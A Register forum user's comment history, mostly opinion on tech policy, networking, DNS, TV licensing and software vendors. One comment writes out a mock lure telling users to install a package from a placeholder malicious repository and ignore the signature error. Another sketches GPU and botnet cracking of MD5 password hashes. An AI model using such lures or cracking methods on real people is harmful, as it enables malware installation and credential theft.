Posts by Crazy Operations Guy 2513 publicly visible posts • joined 29 Jun 2009
Would it really be that hard to monitor database queries and shut off connections if it requests too many rows or performs too many requests? Such a basic bit of protection would do wonders to prevent breaches like this. No legitimate user is going to request tens of millions of rows of data over several tables, so why is doing so allowed? At best, its a bug in the code that should be fixed that should be blocked and rectified anyway.
Yeah and "418 - I'm a Teapot" was such a great use... Besides, would this already be covered under a couple other codes? Error 403 springs to mind or even 410.
But that ignores the fact that most censorship is going to happen on the wire anyway, so either error 404 or a connection timeout would result. For most currently censored things, the protocol seems to be to use a redirect to a page describing why and who is censoring the data, something much more helpful than a cryptic error code.
And now, I'm sure that one of the certification companies is going to come out with a special certification for 'Cyber-security Awareness' so that board members can claim they have cyber security experience and can spout off enough buzzwords to fool investment bankers.
Much like all the Six-sigma certifications that I see incompetent upper management types bandy about.
ISIS has billions of dollars sitting around, I would think that there're at least a few ISPs / TelCo's that are unscrupulous enough to give them a connection. Orascom (an Egyptian company) provide cell services to the North Korean government and they happen to have fiber in Syria, I'm pretty sure that they wouldn't have any qualms about letting ISIS use their links.
As for Satellite links, ISIS has been known to create fake non-profits and charities and I wouldn't put it past them to use one to purchase a bunch of Sat Phones and internet subscriptions.
Yeah, except the vast majority of ISIS's infrastructure is hosted elsewhere in the world. Shutting down the internet in the territory that they control wouldn't hurt them much, if at all. They have enough infrastructure within their territory to continue communicating within their borders. Plus the cell phone companies out there already have a pretty extensive network of microwave nodes that cell service can continue even if they are cut off from the rest of the world (Which wouldn't be that difficult to re-connect over satellite or some other system anyway).
I'm assuming that the problem is automated manufacturing. The board were very likely populated by a pick and place machine, moved to soldering by conveyor belt, then tested with an automated bed-o-nails. Since those tests would've passed, the board would've been pushed to assembly and screwed in the case by assembly line workers who neither know nor care about what they are putting together, regardless of nationality.
The problem likely stemmed from an electrical engineer cleaning up the gerber file from the approved prototype and accidentally cut the two LEDs and forgot to paste them; accidentally moved them off of the board; or maybe deleted them along with the added programming and testing points / LEDs that were on the prototype the production model was based on (I would believe that the testing folk would use port 8's LEDs to indicate specific test conditions and ended up marked as such and being removed when going to production). I've done such things on my own private projects when I'm going over the schematics several times and not under a single deadline, someone working 50+ hours a week could easily make these kinds of mistakes late Friday night before the boards go into production.
But what bothers me is that Cisco isn't using ports with built-in LEDs like everyone else does, especially since external LEDs cost more in terms of both engineering and manufacturing.
Except when you plug it in initially. When you're looking at a network rack or in a networking closet, are you going to be staring at your monitoring software, or the port you just plugged a cable into? Besides, most of the time the physical cabling is done by low-level technician and the actual software side of things is done by a different person / group who are waiting on word from that technician that the cable is plugged in and working. And given that this is port 8 of a block of interfaces, I'd imagine that there've been several cable monkeys wasting hours of time trying to figure out why the other seven ports seem to be working but that one does not.
I always hate it when folk use real IP ranges for stuff like that. I can't count the number of times I've seen networks melt down because someone decided to use the 1.x.x.x network space or some other IP range that wasn't assigned to them. The RFC 1918 space is more than big enough people (a /8, a /12, and a /16 or 17 million addresses), pick something in there and use it...
$12 a month for iPlayer is much, much cheaper than paying my cable provider to push the BBC down to my television...
But what I envisioned would be for all television channels to cooperate with this internet-broadcast company so you'd buy multiple shows during the billing period and pay at the end of the month. Payment could then be handled by someone like Paypal who already have experience in global micro-transactions.
One of my main motivations is that since I'm paying for groups of channels right now, I want the networks to know that I want my money to go to shows I like rather than the crap talk shows and political scream-fests that also happen to be on the same channel (and would thus get a piece of that pie). Or to kill the practice where all show go on hiatus at the same time since I'm still paying for the channel despite a complete lack of anything new that I'd want to watch.
Except in this case I can get a copy of Doctor Who as it airs, rather than waiting a couple weeks while the local BBC affiliate catches up (Which, annoyingly, I have to pay close to $120/month to get since it only comes with the International Favorites HD package and Premium Cable as well as rent the appropriate HD receiver through my cable provider)
The better way to do this is to simple mandate that if someone pays for a piece of media, they can watch it wherever the hell they want. I'd be more than willing to send the BBC a couple pictures of some dead presidents each month to access to iPlayer.
What would be the problem with just determining how much it cost to produce a piece of media, then divide that by the number of people consuming it, then charging the viewers that much to watch said piece of media (plus a reasonable extra bit for profit)?
IN the modern era, couldn't we jsut switch television viewing to a purely pay-per-view like model where you purchase a piece of media based on the production cost and the number of other viewers (and allowing for people to watch advertisements to reduce the amount the would have to pay). However once you purchase that piece of media, you can watch it however and whenever you want. There would be so many benefits for everyone involved, especially for the producers as they would get highly detailed rating information rather than trying to rely on Nielsen ratings and months-old data from the cable providers.
I figure that a system where you'd request the media 24 hours in advance and the production company can only charge enough to repay the production cost, but anyone buying a copy of that piece of media after the broadcast time is charged the same amount as everyone else, but it becomes pure profit for the company. Thus it would give the producers incentive to make good media that the people would want (Since anyone buying after the broadcast time has seen/read a review of it and is still interested in seeing it).
I figure they could've gotten a decent edge by running a cloud to host every app so that the app could be run in both the desktop browser as well as on the mobile device. They could even throw in a secured version of Flash so that any Flash or HTML5-based browser game can be used as an app for FirefoxOS. The phone could then just communicate with a website for the app (Add in some standard website caching to reduce the load)
For revenue, they could extend the HTML5 standard with DRM on the HTML/JS itself and an Ad-frame tag. Especially if the DRM was based on standard x.509 certificates, it'd go like this:
*user buys Angry Birds and transaction goes through
*User's certificate would then be added to the ACL for AngryBirds.store.firefoxOS.com (Or some other URL scheme)
*User can now either go to the site and play / use the app they bought
Such a scheme could also allow a user to authenticate against anything without ever needing a password beyond setting a password on the phone (Which can be the same as their master password for their regular desktop firefox account), they'd simply authenticate with their personal certificate to the various services. The personal certificate could also be used with other browsers and phones. This way, you can theoretically create a truly platform agnostic app store and crush the competition by way of compatibility. Hell, they could even compete on the desktop OS level at that point...
Abused becoming the abusers isn't all that true. The studies that showed that were flawed in their selection of study participants. Furthers studies have shown that there isn't a statistically significant increase in the percentage of child abusers in the formerly abused community vs the community at large. Those with the inclination to abuse children come from every walk of life imaginable, which makes it very hard to actually find the abusers and get proper justice (since the police, and the justice system, are operating on a lot of stereotypes). The organization I volunteer with supports abuse victims and we'll do a quick survey of their situation to figure the best course of action, and we've gotten reports of abuse by the rich and poor, men and women, unemployed and professionals, and from every race. Hell, we had one case where it is was a housewife sexually humiliating their teenage son, she was later caught and interviewed, which produced no evidence that she was ever abused in anyway and grew up in a very healthy and supportive household.
Well, that certainly explains why the US created the Bill of Rights and put in some bits to prevent that when splitting away from British rule. Although I would've assumed that something would have been enacted in the last 250 years to cover that gap... The concept that the police can dump incriminating evidence on you, then arrest you for it is a grave miscarriage of justice...
Then there are the legions of folks that have urges to do such thing but are prevented from seeking treatment because psychiatrists are legally obligated to inform the police even if there is no evidence that they have, or ever will, abuse children. So if you ever even suggest that you had sexual thoughts about a minor to a doctor, even in private and protected sessions, welcome to the Sex Offender registry and a life of everyone avoiding you and thinking that you lure kids to your sex dungeon with candy and a windowless van. But you can tell your psychiatrist that you have these urges to kill people in horrible and disgusting ways, but they legally cannot say a thing unless they fully believe that someone's life is in danger.
I know this because I work for an organization that works to prevent child abuse and to help victims. We've interviewed several abusers (Studying methods that can be used to prevent people from becoming abusers in the first place) and found that they ran into that exact problem and while attempting to find a support group, they found chat rooms full of people telling them how to get away with it and encouraged them to go through with their sick desires (or at least didn't discourage them).
This will never change because who would want to be known as the defender of child molesters?
Indeed, but I suppose that would be where he got the photos and the videos. From my experience dealing with fraud, I would imagine that the targets would want verification photos/video to prevent this exact thing from happening (EG have the child write a specific phrase on their arm and show it on video).
Yeah, but any defense counsel certainly would (and is legally required to do so). There are countless times when a case gets thrown out because the defense simply asks "How did you get that piece of evidence?". Even the most innocent and trivial violation of the chain-of-custody can cause evidence to be thrown out. In this case, the defense could simply argue that the police planted that evidence, and without evidence proving that they didn't, the evidence can be thrown right out the window before making it to trial (This 'paedo hunter' could have been working for the police).
At least this is how it works in the United States (Or at least supposed to if the prosecutors didn't abuse the whole plea-bargaining system and public defenders weren't screwed over so badly).
The Netherlands and rest of Scandinavia / Bavaria all seem to understand that the best way of getting at encrypted data: Acquire a warrant from a legitimate judge, present said warrant to the owner of the encryption key and giving them the opportunity to challenge the warrant (or to later challenge the evidence gathered by the warrant before going to trial).
Interesting how the countries that have don't treat every citizen or refugee like terrorists have the least number of terrorism-related attacks.
The projects they are funding are already open source and you are already using them. The money is earmarked for code improvements and ensuring that there aren't any bugs rattling around (such as Heartbleed or Poodle). These projects aren't trying to create new algorithms, merely ensuring that existing algorithms are implemented safely.
I figure that they can put out a regulation where if you want to run a TLD, you also have to host a root server (and have it verifiable through DNSsec that you haven't tampered with the root zone file). I figure that if you want a piece of the internet, you should be required to also support the rest of it.
Its not like the root zone is really all that expensive to host anyway. Its a simple 1.1 MB file and it only sees a few queries anyway (the zone only contains NS records for the various TLDs out there, and each has a TTL of either 24 or 144 hours) so any client DNS server would only create, at most, 1.1 MB worth of queries every 1-6 days (And that's assuming that that DNS server is trying to find names in every single TLD out there). And the fact that they are distributed would only reduce that load even further.
It bothers me that so much of the Internet's basic infrastructure is hosted in a single country that hasn't really shown that its should be trusted with such things. Every country hosting a root DNS server would then add a bit of accountability to world governments.
In my opinion, we should really move to a distributed DNS type system where a DNS server operator can host the zone files for as much of the internet as they want with each zone being distributed in a signed torrent/diff-file like system. Changes would would be signed by the Authority for each particular TLD (and the root would be authorized by ICANN). Such a system wouldn't need that much engineering to put together. It'd take a while to get it full implemented, but the benefits would be more than worth it.
A copy of all zone records would be less than 100 GB (Just guessing based off of an estimate that an NS record and an A record for each domain would be about 128 Bytes and .com has 122 Million such domain pairs for 14.5 GB for .com and assuming that .com takes up less than 10% of all domains). Even if all 1172 domains were the size of .com, that'd only be 16.6 TB of DNS data total, so with current storage technology, a DNS server hosting every single 2nd level DNS record in the world for only a few thousand dollars in the worst case.
I've never liked the whole 'harvest power from radio waves' idea since you still need to produce the power anyway and converting it to/from radio waves is ridiculously inefficient (Not to mention the interference caused by bumping the power up). Wouldn't it just be easier to use a layer of conductive paint and harvest energy by way of micro pulses? I figure that you'd place these along the top/bottom edge of the wall or in corners, so a thin strip of paint is all that would be needed. You could even base it off the 1-wire bus standard so that the conductive strip also transfers the information.
The problem being that NICs tend to have access to memory at a very low level. A single bug in the code could allow a user-space application to grab sensitive data out of the kernel since the lowest levels of the code have to run in kernel space anyway (IRQ handling, device initialization, IPSEC, authentication, etc).
Really, the risk here is exposing sensitive interfaces to user-mode applications.
The problem is that if they acquiesce to one request to take down a torrent (Which someone could just put right back up a few seconds later), it would set a precedent where they are now open to remove anything that anyone finds offensive. Sure, no one will find a problem with releasing autopsy files of children, but where do you stop? Would you want them to take down photo collections of children being starved to death during the holocaust? What about starving children in Africa? Or photos of ISIS's atrocities? All of those things are quite repugnant and no one wants to see them, but they need to be seen. With the files of those children, what if the files indicated that the children were abused or someone happened to know something missing from the investigation that could prove the suspect's innocence?
Besides, with the way the torrent protocol works, they;d have to hire an army of staff members to download every single torrent, look through the included files, and cross reference them with every single complaint ever brought to them, just to make sure that the content stays down.
Rather than setting any specific DNS servers, I jsut set up a VM on my network running unbind configured to use only the root hints and verify with DNSSec. Pretty easy to do and no risk of the ISP interfering with my queries (especially not trying to redirect to an advertising page when attempting to resolve a bad address).
I registered a domain name about 15 years ago now, not once have I been asked to verify it. Although The domain has never had any web content on it (Well, other than a single file containing only "<html></html>" ). I am still receiving email on that address and DNS queries are still coming in for other resources (I host DNS and some other services out of the domain)
I would think that they'd just use standard animation software to make their cartoons like a real animator would.
Using something like Flash for animation is like trying to nail two boards together by setting a nail on the floor point-up and then slamming the two pieces of wood down on to it.
Why would you use Android for a Communications satellite? The closet thing to android it should have would be a Linux-powered management system and a couple cores running a proper RTOS (Or even just microcontrollers running through closed loops).
These things are supposed to be routing packets, not playing Angry Birds...
> have they always had the privileged access to these APIs that this would require?
I'm thinking that its more of the reverse, that they have always used the undocumented stuff, then find out that it doesn't work anymore, then whine and complain to Microsoft until they put the old calls back in. Adobe does have a massive install base (Wouldn't want to alienate several million potential users), so they have quite a lot of leverage with Microsoft and Apple as far as software is concerned and would thus be able to pry the secrets of fast (and insecure) performance from them. Mostly to keep out the competitors who only have access to the publicly documented stuff, I would assume.
This is starting to change with HTML5 becoming more and more popular, but they'll still have everyone by the dangly bits until we completely move away from Flash and PDFs (As well as finding a good replacement for their photo and video editing suites, but since its a niche, its not quite as important as Flash and Reader)
> And if *that's* true, then how come practically all their software runs like complete turd after the first 10 minutes (max)?
Because a lot of the OS's garbage collecting and caching systems work much better with the standard, documented calls using data structures that they understand, with the undocumented calls, the GC and optimization stuff gets confused and stuff goes wrong
Indeed, other than a few added features, the Windows APIs have remained virtually untouched. Other than the new "App" subsystems, nothing really changed that between 7 and 8 (architecturally speaking). Signed drivers compiled for 7 will run just fine under 8, 8.1 or even 10 (and their associated server versions). And with the security improvements made, its far more likely that a product would run under 7 but not anything later...
I suspect that Adobe is really just dependent on undocumented and unsupported API calls that are intended only for internal OS components.
"vanilla android also means less costs for a phone vendor."
Yeah, but it also means less profit. They include those particular apps to drive folks to their other products, or a partner's product and make money from that. In other cases, they'll make modifications so that people associate the brand with more than the writing above the screen; Its hard to establish brand loyalty when there is no discernible difference between your brand and a cheap phone from a competitor like Huwai.
As for patches, that is the problem with the TelCo, not the phone manufacturer. The TelCo will customize the phone even further, making it nearly impossible for the handset manufacturer from making a proper patch available, so they'll make the source changes, send the diffs down to the TelCo and let them merge and compile the patch to be sent out. But even then, the TelCo will drag its heels as much as possible when it comes to patching bugs that don't prevent the phone from connecting to their network and generating billable activity, especially since patching the phone may cause the phone to fail (Which means both lost revenue while the phone doesn't work, plus the cost of a warranty repair as they were the ones that broke it). Plus, how else are they going to convince someone to upgrade ("We can update your old, obsolete phone to fix its bugs, or you can buy this shiny new phone with better battery life and better reliability for only $20 a month!")
I'd agree when it comes to power-users and other folk who understand what is happening behind the scenes, but as the great unwashed start using it, that'll change fairly quickly.
More and more, I see newbies pop up onto forums asking about a specific piece of software or hardware working and are then directed to install a package off a personal or obscure repository, I don't think it'd be too long (if it hasn't happened already) that someone will post a link to a repository hosting compromised software.
I figure that you could probably get a lot of people to install your malware if you advertise it as something like "Candy Crush for Linux! Just run 'doas apt-get http://malicious.domain.ru/repos/...'. ignore the encryption error since this is my personal repository and I just finished this". Hell, they could cover their tracks by just bundling in an Android Emulator so it works, but does nasty things in the background.
But what worries me the most is the proliferation of systemd and the philosophy that goes with it ('Don't worry, the OS will take care of it, nothing for you to see here, just an obfuscated database and API'); its big and bloated enough that there are many, many little spots to hide malware and other assorted nasties, although one might argue that systemd is, in itself, a piece of malware...
So I'm guessing that you'd normally get just a bunch of local, mass-appeal type websites, but then have to subscribe to the 'Sports Package' to see football scores (subscribe soon to Sports Plus to get Cricket Scores and save up to 10% on your next bill!).
It seems that Google's / Facebook's plan is to set a precedent for lack of net neutrality so that as high-speed connections are rolled-out, no one would notice until its far too late. Much like how the cable / DSL companies managed to get regional monopolies established in the US.
I think that internet access has gotten to the point where its almost a necessity like electricity and water. In which case, I think municipalities should be taking over more and more, or at least offering an alternative to the commercial ISPs (In the same spirit as being able to hire a taxi, or use one of the public buses).
Yep, amendments 4 and 6 to The Constitution, a bit of the 5th as well. The Supreme Court theoretically has the ability to disband and overturn all the decisions of the Secret Court, but they'd need someone to bring such a case to them first (Which is monumentally hard to do since a single denied appeal at any previous level kills that chance, and given that the records are sealed, it is nearly impossible to prove that the secret courts are, in fact, violating the constitution, so no grounds for appeal in the first place)
This is the problem with shared systems, they are only as secure as the other people using it. Of course the solution here would be to build out a massive number of tiny VPN servers and only allow a dozen sessions or so through it rather than very large boxes with thousands of sessions. A tuned linux kernel, a couple libraries, and a VPN daemon would fit in a tiny amount of resources (a single core box with 128 MB of RAM and 8 GB of storage would be more than enough)
I'm sure that the contracts people signed when they agreed to work at Walmart included a provisions to allow an outside company to perform investigations on behalf of Walmart, so handing over an employee list would be perfectly legal. But that wouldn't even be necessary, since the protesters would be motivated to make the pages for coordinating the protest as accessible as possible (to get as many people to participate as possible). Its likely that these protests were organized via a Facebook group or some kind of twitter thread in which the protesters used their real names and probably have 'Employer: Walmart' on their profile pages, so LM would be providing a list of people protesting to Walmart (who would compare it to their employee list, thus side-stepping any possible legal issues with giving that list to a 3rd party).
Or, possibly, LM employees posed as fellow Walmart employees / interested members of the public and joined the various groups (finding the groups by way of a google search for 'Walmart protest'). Its not like the protesters would be doing much in the way of background checks to prevent any adversary from gathering intel on them.
And that would be the problem with publicly traded companies. Half the problem is that the people on the boards that are only interested in pumping the stock price by any means necessary, including lowering employee wages as low as possible (pretty much determined by lowering wages until you run into a labor shortage, or hit the minimum wage). The other half is the owners / executives that look the other way in exchange for massive paychecks (which usually end up being in the form of stock, providing a further incentive to pump stock prices). Especially to blame is the so-called 'activists investors' whose sole objective is to raise stock prices short-term and dump the stock once it hits a certain level and then moving onto the next company without even looking back to see the damage they've done.
So with this situation, you end up with a company that only exists to make money for a select few who give just enough benefits to its employees to keep them from quitting and making products that are barely keeping customers satisfied.
Had to check to make sure there actually will be a February 29th next year. I wouldn't have been surprised to find that they were trying to pull a fast one on us and never delete the information: "We said we will delete it all on 29 Feb 2016, but since that day never came..."
I would assume that an attacker would do it the other way around where a bunch of passwords are taken from a dictionary or brute-force algorithm, ran through an MD5 hash, then compared the results to the list of stolen passwords. A modern GPU could burn through about 2 Billion passwords per second (A report found that an nVidia 8800 Ultra could do 200 million per second with approx 576 GFlops of computational power; its modern equivalent, the GeForce Titan X has about 6100 GFlops of oomph), so going through the most common passwords and most of the English language would probably take an afternoon, throw a botnet / AWS at the problem and you could burn through a significant part of the possible table space in a couple days.
Of course this assumes that you don't already have a bunch of rainbow tables sitting around already.
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2024
